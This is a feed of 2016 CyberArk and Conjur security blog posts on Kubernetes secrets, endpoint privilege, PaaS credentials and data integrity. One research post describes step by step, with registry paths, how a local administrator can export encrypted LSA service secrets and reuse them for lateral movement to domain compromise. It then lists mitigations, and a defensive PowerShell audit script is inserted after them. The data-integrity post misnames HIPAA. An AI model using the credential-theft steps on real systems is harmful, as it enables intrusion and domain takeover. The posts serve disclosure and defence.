Conjur delivers a trust management software platform that enables organizations to balance their goal of adopting cloud computing with their need to ensure security. Conjur automates machine identity provisioning, authorization of privileged access, service account control, and machine-to-machine connectivity in a way that meets the needs of all DevSecOps stakeholders. Companies adopting dynamic, cloud-centric IT infrastructure across industries, including financial services, communications, media and software development, consider Conjur an essential component of their security strategy. Conjur is headquartered in Waltham, Mass., and is backed by Amplify Ventures, Avalon Partners and Koa Labs. For more information, please visit www.conjur.net or follow @conjurinc on Twitter.

About Springboard Enterprises
Springboard accelerates the growth of entrepreneurial companies led by women through access to essential resources and a global community of experts. It is the leading network of influencers, investors and innovators dedicated to building high growth companies led by women. Since 2000, 642 Springboard portfolio companies seeking investment of financial and human capital for product development and expansion have raised $7.4 billion, created tens of thousands of new jobs, and generate billions of dollars in annual revenues. Over 80% of Springboard companies are growing as independent or merged entities, including 13 IPOs, more than 160 M&A, and many that are the technology engines of publicly traded companies. Springboard invites a select group of women-led healthcare and technology companies annually into the network to support these talented women innovators and to send a message that business success and investor returns all benefit from diversity in their companies and boardrooms.

Media Contact:

Lesley Sullivan

LaunchSquad

617-945-1915

conjur@launchsquad.com

All trademarks recognized.

 

]]>
Security Holes Persist in Kubernetes: KubeCon 2016 Recap https://www.cyberark.com/blog/security-holes-persist-in-kubernetes-kubecon-2016-recap/ Mon, 28 Nov 2016 09:51:00 +0000 https://cyberarkvx2.wpengine.com/blog/security-holes-persist-in-kubernetes-kubecon-2016-recap/  

Earlier this month I had the privilege of attending KubeCon, a two-day conference all about the latest and greatest developments in the Kubernetes ecosystem. Held in downtown Seattle, the event sold out with 1,000 attendees. Next year, KubeCon will come to Austin, TX, in an even bigger venue.

Excitement was high. Kubernetes 1.4 had shipped shortly before the event and much of the crowd seemed focused on either upgrading their existing clusters and/or taking advantage of new features in the release. As Conjur’s developer advocate and resident DevOps cheerleader, I was most eager to learn about how Kubernetes users addressed their various organizations’ governance and compliance requirements.


Learning Kubernetes at KubeCon is like learning to drink water from a firehose, but as I looked over my pages of notes (and recalled discussions from previous ContainerDays events) a few points about Kubernetes and the direction of its ecosystem became clear. Excitement is high, the ecosystem is exploding, but as is often the case in the early days of emerging technologies, security is a second-class citizen. The following points are my big takeaways from the conference.

1. The ecosystem is exploding with vendor and open-source tooling

The Cloud Native Computing Foundation (CNCF), the new steward of Kubernetes and of a growing list of related tooling, is working on a Cloud Native Landscape reference that maps the technologies and tools available in the “cloud native computing” space. A work in progress, this reference will surely grow over time. If you’ve been following the DevOps space lately, many of these logos will be familiar.


Analysis paralysis could become a problem here; there are simply a lot of vendors and technologies in this space. Some are competing head-to-head, but several of these technologies overlap in their feature sets. Expect to spend a lot of time evaluating several technologies to find the one that fits your use case.

It is interesting to note that 19 of the 37 sponsors for KubeCon are offering a ‘wrapped’ or hosted version (PaaS) of Kubernetes. Most are targeted towards enterprise customers that require additional features not implemented by Kubernetes itself (SSO, multi-datacenter dashboards, etc.). Key selling points of these PaaS versions of Kubernetes are ease of deployment and minimizing operational maintenance. However, you do run the risk of lock-in or feature drift from Kubernetes core.

Some of the new open-source tooling that people were talking about at KubeCon:

  • Anchore – Image security scanning CLI
  • Kompose – Renders Kubernetes resource YML from a docker-compose file
  • Calico – L3 network mesh with built-in traffic authorization
  • jsonnet – JSON templating tool, useful for Kubernetes resource files
  • linkerd – Service mesh for cloud-native applications
  • Helm – Kubernetes package manager, just reached 2.0

2. Setting up a proper production cluster is still pretty difficult


Kubernetes is composed of a number of technologies that work together to provide its feature set. This modular architecture makes it easy to scale your cluster efficiently at the cost of increased operational complexity. Several projects are now available that make it easier to stand up and maintain a Kubernetes cluster. They each have their own assumptions, benefits and drawbacks.

For local Kubernetes development, minikube is simple to get up and running. This project allows you to run and manage Kubernetes on a local virtual machine. minikube is a great way to try out Kubernetes locally. Be aware, though, that all of Kubernetes’ components are running on one machine – some features of Kubernetes like load-balancing across nodes won’t be possible. CoreOS has also released tooling for running single and multi-node clusters locally with Vagrant.

Setting up a production Kubernetes cluster can be a pain, and everyone knows it. This is why we see so many wrapper/PaaS versions of Kubernetes being made available. There are many different tools and projects that make launching a highly-available cluster easier. kops, from the Kubernetes team, provides cluster CRUD operations on top of AWS. CoreOS maintains kube-aws, a similar tool. Most platforms now have tooling for running Kubernetes clusters. Launching a cluster from scratch is also an option if you’re curious about how everything fits together.

3. Kubernetes Secrets has an Achilles Heel, and it is etcd


Secrets were added to Kubernetes in v1.3. Users create secrets and specify the pods that can read them. Sensitive credentials are made available via a temporary file system running on the cluster nodes running the pods that need them. Secrets are easy to use and provide a basic level of security for credentials that shouldn’t be built into images or passed via environment variables. That said, there are a number of potentially serious risks to consider when using Kubernetes secrets.

From the Kubernetes secrets documentation:

[Screenshot of the Kubernetes secrets documentation]

In practice, the engineers I talked to at KubeCon were either locking down their etcd cluster to only senior operations staff or searching for a better solution for providing secrets to their Kubernetes applications. The coarse root/non-root authorization of the Kubernetes API is also a big issue for many companies. When least privilege isn’t enforced you end up with an unreliable system.

Conjur is currently planning support for making secrets available to Kubernetes. Robust role-based access control and immutable audit are standard features for any secrets management solution.

4. Governance and security are still in the back seat


There are a number of security problems the community will need to address before Kubernetes can become a viable strategy for many organizations. Secrets insecurely stored in etcd, underdeveloped authentication/authorization for interacting with the API, escalation issues on the nodes, lack of an immutable audit log; any one of these can be a deal-breaker for organizations that want to allow more than a handful of engineers to use Kubernetes.

There are a few interesting projects attempting to tackle these issues. Calico allows you to declaratively define which pods can talk to each other at the network level. dex is an OpenID Connect provider that plugs into Kubernetes to provide authentication from a number of pluggable sources. Securing Kubernetes will be a hot topic in 2017. Look for lots of activity in this area from Conjur and others.

Closing

KubeCon was a fantastic experience. I came to the event to hear stories from people about running Kubernetes in production; how they set it up, what challenges they face, and where they’re going from here. The development workflow and resource utilization Kubernetes enables are compelling reasons for many companies to rethink how they will deliver software in the coming years.

Governance and security are still ‘in the wild west’, as I heard a few times at the conference, but work is being done to hold Kubernetes to the same standard we require for other parts of our infrastructure. If secrets management, authentication, and authorization of your Kubernetes deployments is an issue you’re thinking about, I’d love to hear from you at dustin.collins@conjur.net. Conjur is building out our support for Kubernetes, and we welcome design partners.

Fundamental Endpoint Security Best Practice: Securing Privilege on the Endpoint https://www.cyberark.com/blog/fundamental-endpoint-security-best-practice-securing-privilege-endpoint/ Wed, 23 Nov 2016 14:13:55 +0000 https://www.cyberark.com/blog//

Information security professionals know there are two fundamental endpoint security practices that should be part of their security program in order to reduce the attack surface. Validated by various government information security organizations and industry analysts, the first practice is application patching, and it has been widely adopted thanks to commonly available enabling tools. The second is securing privilege on the endpoint.

As part of the research conducted for the “CyberArk Global Advanced Threat Landscape Survey 2016,” 750 IT decision makers were asked if their organization’s users have local administrative privileges on their endpoint devices. Sixty-two percent said yes.

Removing local admin rights from workstations is perceived to be a difficult trade-off between security and usability. This is because the end-user often has to contact the desktop support team for the most trivial of tasks, resulting in lost productivity.

This also increases the burden of work for the support team, which can lead to missed service level agreements and increased support costs. The overall result can be a stand-off between the information security and desktop support teams.

Plugging endpoint security gaps

To compensate, organizations have added layers of preventative endpoint security, including anti-virus, personal firewalls, intrusion prevention, application and device control.

Even with these in place, many view a network breach as inevitable. In response, data loss prevention (DLP) has been deployed to detect and block attempts to exfiltrate sensitive information. In many instances, file and full disk encryption has also been added to ensure that any information stolen is useless – unless the attacker also steals encryption keys.

Today the perceived choice is either to bet on yet more prevention controls or follow the continued acceptance that a breach is inevitable, and therefore, opt to add detection and response capabilities. These complement prevention controls by helping organizations to understand when and where malicious activity might occur on their network; unfortunately, they often offer too little too late, especially with the current ransomware trend.

Enforcing least privilege

What if information security professionals could go back to that fundamental best practice that is missing? If they can overcome the objections to deploying technologies that allow them to do what they know is right, their endpoints could be far more secure. There are better options today. For example, combining least privilege management with application control allows revocation of local administrator rights, but also offers elevation of privilege for trusted applications when needed.

Facilitating application control

Application control can provide significant additional benefits, such as enabling a policy-based approach to allow known good applications to execute while blocking malicious software. There are two common objections to this approach, which CyberArk has addressed – manual policy creation and the binary approach of white and black listing.

By trusting sources of files, such as those from software distribution tools or file shares, and those with trusted signatures, CyberArk has found that 99% of applications can be automatically added to the policy. The final 1% do not have to be treated in a binary manner. This is the practice that creates a user productivity issue and generates a help desk call when the user tries to install a new application. You can run unknown applications in a restricted mode but prevent access to sensitive information, network shares and the Internet. If the application is malicious, the threat is contained on the endpoint.

Containing attacks on the endpoint

Least privilege combined with application control is a security best practice to contain attacks on the endpoint. As part of a program to secure privileges on the endpoint, consider protecting Windows credentials and those stored by popular browsers too. If you can detect and block credential theft attempts, you will stand a far better chance of containing an attack on the endpoint.

Learn more about how CyberArk can help organizations to enforce privilege security on the endpoint without the negative impact of removing local administrator rights. Visit: https://www.cyberark.com/endpoint-privilege-manager/.

Introducing CyberArk Endpoint Privilege Manager https://www.cyberark.com/blog/introducing-cyberark-endpoint-privilege-manager/ Fri, 18 Nov 2016 15:03:15 +0000 https://www.cyberark.com/blog//

Information security professionals recognize that cyber attackers will exploit endpoint vulnerabilities and then make a beeline for privileged credentials. As a result, organizations are evaluating how they can take steps to secure privilege on the endpoint as a fundamental part of their security program.

CyberArk Viewfinity has enabled organizations to reduce both the attack surface and the risk of information stolen or encrypted and held for ransom—all while achieving the right balance between productivity and security. To keep pace with the ever-evolving threat landscape, we unveiled new threat protection features this week: CyberArk Viewfinity is now available as CyberArk Endpoint Privilege Manager.

By interlocking three core capabilities: privilege management, application control and new credential theft detection and blocking, CyberArk Endpoint Privilege Manager represents a combination of powerful technology, deep research and best practices to stop attackers from advancing beyond the endpoint and doing damage. Key enhancements include:

  • New behavioral analytics to block and contain advanced threats targeting credential theft at the endpoint.
  • The ability to detect and block credential theft attempts by malicious users and applications, including Windows credentials, remote access application credentials and those credentials stored by popular web browsers for use with, for example, corporate network and cloud applications.
  • The ability to block hash harvesting at the endpoint to prevent Pass-the-Hash, an attack leveraging stolen credentials.

The introduction of CyberArk Endpoint Privilege Manager comes on the heels of an FBI flash alert that recommends prioritizing credential protection, including implementing least privilege and restricting local accounts, to limit a threat actor’s ability to gain highly privileged account access and move throughout a network.

CyberArk Endpoint Privilege Manager is available now. For additional resources on detecting and containing cyber attacks while effectively balancing security and productivity, visit https://www.cyberark.com/products/privileged-account-security-solution/endpoint-privilege-manager/.

CyberArk Labs Research: Stealing Service Credentials to Achieve Full Domain Compromise https://www.cyberark.com/blog/cyberark-labs-research-stealing-service-credentials-achieve-full-domain-compromise/ Wed, 16 Nov 2016 16:59:07 +0000 https://www.cyberark.com/blog//

Executive Summary

The CyberArk Labs team has discovered a way to harvest encrypted service credentials from the Local Security Authority (LSA) Secrets registry hive and inject them into a new malicious service to achieve lateral movement and full domain compromise. This exploit requires that an attacker first gain local administrator privileges on an infected machine, but once those local administrator privileges are gained, the attacker can leverage a single domain-joined workstation to laterally move throughout the domain and ultimately gain access to a domain controller. This exploit can be carried out on Windows endpoints, including on the most up-to-date Windows 10 workstations that have Credential Guard (VSM) enabled.

This blog will explain how service credentials are protected today, how they can be compromised, and how the CyberArk Labs team proved that this exploit can enable lateral movement and domain compromise.

Background: How are service credentials protected today?

Beginning in Windows 7, Microsoft began protecting service credentials by securely storing them in the LSA Secrets registry hive (HKEY_LOCAL_MACHINE/Security/Policy), which is part of the Security registry hive. Here, the credentials are encrypted with the System Key using the Data Protection API (DPAPI). By default, access to the Security registry hive – and thus the Secrets within it – is restricted to the SYSTEM account only, meaning not even the Administrator can access them. However, despite this default setting, the Administrator maintains the permissions necessary to not only remove this restriction but also open a new session as the SYSTEM user and effectively operate with SYSTEM privileges. By taking advantage of these permissions, an Administrator can gain access to the LSA Secrets, dump the credentials from the registry hive and extract them using the DPAPI.

In Windows 10, Microsoft introduced Credential Guard, which was designed to mitigate the risk of lateral movement using compromised credentials (and credential hashes) by proactively securing domain user credentials in memory in an isolated, highly secure location. However, because Credential Guard only secures credentials in memory, it cannot protect service credentials that are required to properly boot the system. As a result, these service credentials, which may have domain access, remain in the LSA Secrets registry hive.

Newly Discovered Risk

The CyberArk Labs team recently discovered that service credentials stored in the LSA Secrets registry hive can be compromised in encrypted form and used to achieve lateral movement, even when Credential Guard in Windows 10 is enabled. Similar in concept to Pass-the-Hash exploits in previous versions of Windows, an attacker can use compromised encrypted secrets to laterally move through the domain without ever needing to know the underlying credential.

The Proof of Concept

Because this specific risk involves the compromise of service credentials, we hypothesized that these service credentials – which are used for legitimate services – could potentially be captured and injected into a malicious service, thus granting an attacker access to all systems and resources to which the original service had access. If this proved true, then any malicious user with local Administrator access on a Windows machine could reuse stored domain-level service credentials to laterally move through the network and potentially gain access to a domain controller.

To test this hypothesis, we started with the following baseline environment:

  • Local Administrator access on a Windows 10 laptop
  • Credential Guard enabled on the Windows 10 laptop
  • One service with non-administrative domain credentials

To test against this scenario, we created a new, blank service into which we would attempt to inject captured service credentials.  This blank service was designed to imitate a malicious service that an attacker could create and use in the wild.

Step 1: Gaining Access to LSA Secrets

The first step in gaining access to LSA Secrets is to grant the local administrator access to the Security registry hive. As mentioned above, by default, this access is reserved for the SYSTEM user only. However, the local Administrator has the permissions needed to change this default setting.

Figure 1: Security registry hive default Administrator permissions

Using local Administrator permissions, an attacker can edit the Security permissions to grant the Administrator access to the Security registry hive (HKEY_LOCAL_MACHINE/Security). Once the attacker (the “Administrator”) has read and write permissions to the Security registry hive, he or she is able to access the registry and begin searching for service secrets.

Step 2: Searching for Service Secrets

With access to LSA Secrets, we next queried the machine to search for services with domain-level access. Note, these services did not have administrative permissions; they simply had non-administrative access to other systems on the same domain.

Figure 2: Service enumeration

This query identified two services that had domain-level access: AppVClient and tzautoupdate. These services are both standard on all Windows 10 machines, and we were able to locate their secrets in the registry under:

  • HKEY_LOCAL_MACHINE/Security/Policy/Secrets/SC AppVClient
  • HKEY_LOCAL_MACHINE/Security/Policy/Secrets/SC tzautoupdate

We exported these secrets from the LSA Secrets registry hive in encrypted form and did not attempt to decrypt them with the DPAPI.  At this point, the secrets were still configured to enable authentication for these specific services only. Before we could change the configurations to execute the test using our new service, we also needed access to services’ properties.

Again, using our local Administrator access, we went to the registry and exported the properties associated with these services from: HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services.

Step 3: Modifying the Secrets and Properties for Reuse

As mentioned above, the legitimate services’ secrets and properties were both configured to work for their specific services only – meaning we could not reuse them as is. However, we hypothesized that we could potentially modify the configurations of the secrets and properties to enable them to work with a different service. To test this, we used the blank service mentioned above.

Using the exported versions of the services’ secrets and properties, we modified the configurations so that both would point back to our new, blank service.

Figure 3: Service modifications

We then imported the modified secrets into the blank service’s secrets and the modified properties into the blank service’s properties, as shown in Figures 4 and 5.

Figure 4: Import modified service secrets into blank service secrets

Figure 5: Import modified service properties into blank service properties

Next, we started the blank service on the machine and put it to the test.

We performed domain controller enumeration to quickly locate domain controllers, and we searched for services that had high privileged access to all enumerated domain controllers.  We also looked for all systems connected to the original victim system.  If the victim machine did not contain any services with domain controller access, we wanted to be able to laterally move to other machines, which may contain services with higher privileges.

Step 4: Achieving Lateral Movement and Full Domain Compromise

Using the compromised service information combined with information about connected systems on the network, we tested our blank service to see if we could successfully achieve lateral movement. The results were a very clear “yes.” Using these compromised and reused service credentials, we proved that compromised service credentials could, in fact, be used to achieve lateral movement.  And, with each new machine accessed, we had the potential to find service accounts with higher and higher privileges on the domain. With each new machine compromised, we were able to repeat the process of service credential compromise, modification and reuse until we eventually located a service account that had access to the domain controller and achieved full domain compromise.

Real world implications

Testing in the CyberArk Lab clearly demonstrated that an attacker with local Administrator access on a single user’s machine can compromise service credentials and reuse them to achieve lateral movement and full domain compromise – even when Credential Guard is enabled.

In a real-world scenario, an attacker could use this same process of service credential theft, modification and reuse in a malicious service, and the attacker could configure the malicious service to automate each iterative step of this attack. In such a scenario, an attacker with local Administrator access on one machine could gain full ownership of the entire domain in just minutes.

Mitigations

Despite common assumptions, Microsoft Credential Guard does not protect domain-level service credentials in the same way that it protects domain-level user credentials. As such, organizations must take extra steps to secure and monitor the use of service credentials.

To reduce the risk of service credential theft – and the resulting ability for an attacker to laterally move through the network until they gain domain administrator privileges – organizations should take the following steps:

  • Remove local administrator privileges from standard users
  • Minimize the use of domain accounts in local services to only those that are required
  • When needed, create dedicated domain accounts for services
  • Remove all unnecessary privileges from service accounts
  • Monitor all permissions changes to sensitive registry values via the Windows Event Log
  • Use credential theft detection tools to detect and block the theft of LSA Secrets
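As an added illustration of the second, fourth and fifth mitigations (example code, not part of the CyberArk Labs research), this PowerShell inventories services whose logon account is a domain account and adds an audit rule so that the hive permission change described in Step 1 is written to the Security event log; the domain name, event ID and audit-policy command are assumptions about a standard Windows 10 build.

```powershell
# Added defensive audit script; it is not code from the CyberArk Labs research.
# Assumptions: Windows PowerShell 5.1 on a domain-joined host, run from an elevated
# prompt (the SACL change needs SeSecurityPrivilege). Maps to three mitigations:
#   - minimize/justify domain accounts used by local services  (inventory below)
#   - remove unnecessary privileges from those accounts         (review the output)
#   - monitor permission changes to the Security hive           (SACL + Event ID 4670)

# Service logon identities that do not carry a reusable domain credential.
$script:BuiltinLogons = @('LocalSystem',
                          'NT AUTHORITY\LocalService',
                          'NT AUTHORITY\NetworkService')

function Get-DomainServiceAccounts {
    param(
        # NetBIOS domain name; assumed to be the host's own domain.
        [string]$Domain = $env:USERDOMAIN
    )
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $logon = $_.StartName
            $logon -and
            ($script:BuiltinLogons -notcontains $logon) -and
            (($logon -like "$Domain\*") -or ($logon -like '*@*'))   # DOMAIN\user or UPN
        } |
        Select-Object Name, DisplayName, StartName, StartMode, State, PathName
}

function Enable-SecurityHiveAudit {
    # Audit changes to the DACL or owner of HKLM\SECURITY, the change an attacker with
    # local admin makes in Step 1 before dumping LSA Secrets. With the Object Access >
    # Audit Registry subcategory enabled, a successful change logs Event ID 4670
    # ("Permissions on an object were changed") in the Security log (assumed event ID).
    $key = 'HKLM:\SECURITY'
    $acl = Get-Acl -Path $key -Audit
    $rule = New-Object System.Security.AccessControl.RegistryAuditRule(
        'Everyone',
        [System.Security.AccessControl.RegistryRights]'ChangePermissions, TakeOwnership',
        [System.Security.AccessControl.InheritanceFlags]'ContainerInherit',
        [System.Security.AccessControl.PropagationFlags]'None',
        [System.Security.AccessControl.AuditFlags]'Success, Failure')
    $acl.AddAuditRule($rule)
    Set-Acl -Path $key -AclObject $acl
    # Turn on the subcategory if it is not already:
    #   auditpol /set /subcategory:"Registry" /success:enable /failure:enable
}

# Inventory first; review each row before deciding whether the account is required.
Get-DomainServiceAccounts | Format-Table -AutoSize
# Enable-SecurityHiveAudit   # uncomment once the audit policy change is approved
```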

Disclosure Timeline

  • October 25, 2016: Risk reported to Microsoft Security Response Center
  • October 26, 2016: Microsoft responded that they did not consider the submission a valid vulnerability as it requires an attacker to have already compromised the machine.*
  • November 16, 2016: Public disclosure

*According to Microsoft’s “Ten Immutable Laws of Security”

The Monetary Authority of Singapore Emphasizes Privileged Account Security in its Technology Risk Management Guidelines – Why? https://www.cyberark.com/blog/monetary-authority-singapore-emphasizes-privileged-account-security-technology-risk-management-guidelines/ Wed, 09 Nov 2016 14:25:02 +0000 https://www.cyberark.com/blog//

In June 2013, the Monetary Authority of Singapore (MAS) enhanced its Technology Risk Management (TRM) guidelines to provide banks and financial institutions with a risk management framework for their IT environments. Recognizing that improper control over privileged accounts is one of the largest security risks organizations face, the TRM guidelines emphasize specific requirements related to privileged account security.

Privileged Accounts are Powerful

Privileged accounts are the keys to the proverbial IT kingdom. They enable the highest level of access and operation in IT networks, and therefore pose the most significant security concern. If hijacked by an external attacker or a malicious insider, privileged accounts will allow attackers to take full control of the IT infrastructure, disable security controls, steal confidential information, commit financial fraud, disrupt operations and much more. That’s why TRM guidelines 11.1 state that financial institutions should:

  • Only grant user access to IT systems and networks on a need-to-use basis and within the period when the access is required.
  • Ensure that records of user access are uniquely identified and logged.
  • Enforce strong password controls over users’ access to applications and systems.

By employing a proper privileged account security platform that discovers, secures and rotates credentials, while granularly controlling the use of privileged accounts, organizations can limit privileged access to only those individuals who truly need access.

Privileged Accounts are Extensively Used

Privileged accounts are not just associated with IT admin accounts or super users. These accounts are configured in every device on the network—and are also used by third parties and automated processes (such as those that control backup, access databases and perform other back-end functions). That is why the guideline 5.1.4 of the TRM stipulates:

  • IT outsourcing should not result in any weakening or degradation of the financial institution’s internal controls.
  • The financial institution should require the service provider to employ a high standard of care and diligence in its security policies, procedures and controls to protect the confidentiality and security of its sensitive or confidential information, such as customer data, computer files, records, object programs and source codes.

Think about it. How many vendors and contractors does your company work with? Their access is often privileged and needs to be protected.

Privileged Accounts are Highly Coveted

By analysing the majority of cyber breaches in the past 24 months, a common thread emerges: the external attackers penetrated the perimeter security of the targeted network, then leveraged stolen credentials to escalate privileges, conduct reconnaissance and move laterally in the network—all while avoiding detection. In some cases, the attackers stayed in the network for months without detection. That’s why 9.6.1 of the TRM guideline notes that:

  • Security monitoring is an important function within the IT environment to detect malicious attacks on IT systems. To facilitate prompt detection of unauthorised or malicious activities by internal and external parties, the financial institution should establish appropriate security monitoring systems and processes.

A proactive step to mitigating this risk is to isolate, monitor and control privileged sessions to prevent the sensitive credentials from residing on less secure user endpoints. Real-time monitoring and termination of privileged sessions due to unexpected or malicious activity provides additional layers of protection.

With the evolving threat landscape and growing complexities and reliance on IT systems in the financial sector, financial institutions must implement controls to secure their IT environments to avoid costly data breaches. The MAS TRM guidelines provide a valuable, in-depth model to follow. To learn more, download our free whitepaper.

PaaS-ing Secrets: Security Considerations for Pivotal Cloud Foundry Deployments https://www.cyberark.com/blog/paas-ing-secrets-security-considerations-for-pivotal-cloud-foundry-deployments/ Mon, 07 Nov 2016 16:47:00 +0000 https://cyberarkvx2.wpengine.com/blog/paas-ing-secrets-security-considerations-for-pivotal-cloud-foundry-deployments/  

In working with our customers who use Pivotal Cloud Foundry’s Platform-as-a-Service (PCF’s PaaS), Conjur’s technical field teams have identified common security concerns for production deployments. These challenges are sufficiently serious to block important applications that handle sensitive data from going into production. The issues described below should be considered by developers and application architects early in the PCF application development process, and they are likely common to other cloud PaaS platforms too.

Introduction

Organizations that deploy on PCF’s PaaS are optimized for speed of application development.  By virtue of PCF’s low-friction deployment workflow, applications can germinate, evolve, and scale quickly, sometimes at breathtaking speed.

But two operational problems exist for any PaaS around introducing sensitive access credentials, like database passwords and cryptographic keys, into the ephemeral servers that get created:

  1. How are the credentials’ environment variables populated, without delay, in a trusted, audited manner?
  2. What are the properties of each credential relating to trust, isolation, and control?

Pivotal’s Chief Security Officer offered a compelling view earlier this year on how to make enterprise security more effective by making infrastructure more dynamic.  He called for faster repaving of servers and applications (restoring them to a known good state every hour), repairing vulnerable operating systems within hours of a patch being available, and rotating data center credentials frequently — as often as every minute!  As he noted at the end of his post, PCF doesn’t offer automated credential rotation yet, and that gap is proving problematic for some customers trying to get security-sensitive applications into production.

The question of credential rotation sounds deceptively simple, but when you dig into the requirements that large, security-conscious enterprises have, it’s much more complex as the rest of this post will illustrate.

Population of Credentials

The simple separation of secrets into configuration environment variables is a good start (see Heroku founder Adam Wiggins’ 12-factor app best practices), but that is only the beginning. For larger organizations with certain compliance requirements, an added goal is the separation of responsibility: a credential-trusted operator should be separate from a deployment-trusted operator. Binding credentials in environment variables crosses those concerns, because the deployment-trusted operator now needs access to the credentials. The naive alternative would be a two-operator rule for every deployment action. Unfortunately, that would likely slow deployments and erase some of the agility benefits of a PaaS, per Factor X: Dev/Prod Parity.

A slightly better approach is Cloud Foundry’s concept of user-provided services (via cf cups and cf uups, see http://docs.cloudfoundry.org/devguide/services/user-provided.html#user-cups), which can make shared credentials available outside of the lifecycle of an app instance. In short, that provides some separation of concerns and allows developers to release without hindrance. That’s a good next step. However, there’s no audit trail, and every application in that service group has visibility into all credentials. There’s no finer-grained policy mechanism available.

Properties of Credentials

More broadly, some questions that affect PaaS credentials include:

  • Is there a clear, declarative policy for each class of credential enforcement? Can it be audited and trusted? How are least-privilege policies implemented?
  • What is the authentication and authorization workflow for programmatically issuing new credentials?  What are the delegation and trust mechanisms around that?
  • For elastic hybrid clouds, how do you isolate public vs. private cloud credentials?  Are there different policies in different environments?
  • What are the audit control points that can keep up with the rapid nature of a PaaS? How tamper-resistant are audit logs?
  • What are the secrets rotation policies and how do they get implemented?  Can routine rotations be handled with minimal disruption?
  • Can you securely, automatically issue credentials and secrets to supporting components like a load balancer’s SSL private key with the same level of policy and audit control?
  • What is the maximum velocity at which you can issue unique credentials?  In a standing-start reboot scenario, is your credential system a bottleneck?
  • Where are root credentials stored and accessed for disaster recovery?
  • Is there a break-glass procedure for emergencies?
  • What are high availability / resiliency options in the event of partial failures?

Conjur PaaS Design Pattern

Figure A. Conjur PaaS design pattern:

  1. Security team authors and publishes declarative, reusable security policy.
  2. Dev team authors code and pushes to PCF as normal.
  3. Application is instantiated as normal.
  4. Conjur Summon, included in asset, authenticates to PCF/Conjur authenticator.
  5. Authenticator retrieves token from Conjur Server (or a follower) and returns it to Summon.
  6. Token is submitted to Conjur Server for a particular secret, e.g. a database password, per security policy.

A Conjur implementation can provide solutions to all of these needs.  In this application design pattern, application credentials are issued from a Conjur master server or a remote follower if in a hybrid cloud. A PaaS instance authentication service ties the PaaS orchestration mechanics to the credential service.  For each requesting application instance, the authentication service compares the metadata provided by the orchestration service upon app provisioning with an incoming request for new credentials.  If all criteria are met, an ephemeral token is issued that can be submitted to the Conjur server for the needed credentials, say a database server.

The presentation of “identity”, the fetching of the token, the subsequent exchange for a valid database credential and then the injection into the running environment variables is done automatically using Summon, Conjur’s open source secrets injection tool.  Incidentally, Summon can be used to inject secrets into any application’s environment, so a standard, policy-driven, audited process can be implemented for supporting components too.

By using Conjur both to create a declarative policy and enforce that policy at run-time, the design pattern effectively governs trust uniquely to each instance.  A clustered Conjur set-up provides for resiliency and high availability with a tamper-resistant audit trail.  The Conjur cluster can be easily sized to handle extreme scaling for high-volume application or standing-start situations.  And by having a control point for credentials, rotation of credentials can be done programmatically to minimize disruptions.

If desired, different policies can be applied for different categories of instances (e.g. internal vs. external) in order to manage exposure and risk in less trusted environments.

- !policy
  id: hello-world
  body:
  - &runtime-variables
    - !variable database/url
    - !variable database/username
    - !variable database/password
  - !layer
  - !permit
    role: !layer
    privilege: [ read, execute ]
    resource: *runtime-variables

Figure B. Sample Conjur policy

Closing

At Conjur, we’ve observed that for enterprises with high-value applications like banks, infrastructure providers, and governments, the rapid deployment authority of PaaS creates a new class of security challenges.  Access to account databases and sensitive functions like treasury servers is necessary for applications.  But that access must be meted out in the smallest measure, and then each access credential must be carefully isolated for risk, audit, and governance compliance.

A manual provisioning process for those access credentials won’t cut it.  Manually creating a few credentials a day doesn’t stand a chance against a team of developers that’s releasing apps and refreshing several times an hour… or, worst case, in an infrastructure restart requiring the provisioning of potentially millions of secrets per minute.

Conjur’s core architecture is designed for robustly handling these and other authentication and authorization challenges.  Not only does it automate the management of secrets at the speed and scale demanded by developers of modern applications, but it also creates a visual representation of the security architecture and provides an audit trail that enables the business to deploy with confidence.

If you want to learn more, check out our whitepaper on Privileged Access Management for the Cloud & Container Era or see it in action by requesting a demo here.


]]>
Cyber Security: Don’t Ignore Data Integrity https://www.cyberark.com/blog/cyber-security-dont-ignore-data-integrity/ Thu, 03 Nov 2016 18:10:50 +0000 https://www.cyberark.com/blog//

Cyber security is an enabler of the digital transformation of business. While Information Technology allows the rapid delivery of goods and services and the real-time understanding of customers, markets and industries, security enables companies to use technology by ensuring that data remains protected.

Confidentiality and availability are two essential elements of cyber security, and data integrity is equally critical. Integrity ensures the accuracy of data used in business processes and transactions.

Assuring accuracy

It can be difficult to prevent or even detect the theft of data. Breaches can go undetected for months, and often the victim is not aware of the loss until it is discovered by a third party, such as the FBI. Detecting the corruption or alteration of data can be even more difficult. If the data remains in the appropriate format, tampering can be less evident than theft, although the value of the data can be seriously affected.

Companies must consider not only the integrity of data in databases and applications, but also of data that has been backed up for use in disaster recovery. The National Cybersecurity Center of Excellence—a partnership between industry and the National Institute of Standards and Technology (NIST)—was formed to address the most pressing cyber security challenges to business. One of these challenges is assuring the accuracy of back-up and recovery data. Key questions being addressed by NCCoE include:

  • How can we tell what data was corrupted, and when, how and by whom?
  • What was the impact of the data corruption?
  • Which backup version should be used to recover the data?

Confidence and more at stake

A company that is not sure of the integrity of its data cannot be sure that critical operations are being carried out properly, that correct decisions are made, or that the appropriate goods and services are delivered to customers and received from suppliers.

This can have a direct business impact, resulting in mistakes and missed opportunities, wasted money and lost income. But beyond these immediate losses are the broader problems of public confidence and brand reputation. A company that does not effectively serve its market can lose the confidence of its customers, resulting in long-term damage to its brand.

Legally, data integrity is necessary for non-repudiation—the ability to ensure the authenticity and accuracy of agreements and transactions. It also is required by government and industry regulations, including the federal Health Insurance Portability and Availability Act (HIPAA) and the Payment Card Industry Data Security Standards (PCI DSS).

The issue of data integrity has recently come to the forefront in the public sector with concerns of possible foreign tampering with U.S. election systems. These concerns resulted in a warning from the Department of Homeland Security and the Director of National Intelligence, urging “state and local election officials to be vigilant and seek cybersecurity assistance from DHS,” to ensure the integrity of election data.

Ensuring integrity

A powerful tool in ensuring data integrity is hashing—using a cryptographic algorithm to reduce a file or data element to a short string of numbers called a hash or a message digest. Done properly, this message digest is unique to the piece of information being hashed, so any change in the data will produce a completely different digest. A comparison of digests from a Secure Hash Algorithm (SHA) will immediately indicate any change in the data.

NIST last year approved a new hash standard, SHA-3, a “next-generation tool for securing the integrity of electronic information.” The new algorithm did not replace the existing SHA-2 algorithm, which appears to have years of life left in it, but is a backup put into place against the day SHA-2 becomes vulnerable to attacks. The SHA-1 algorithm no longer is recommended for use.
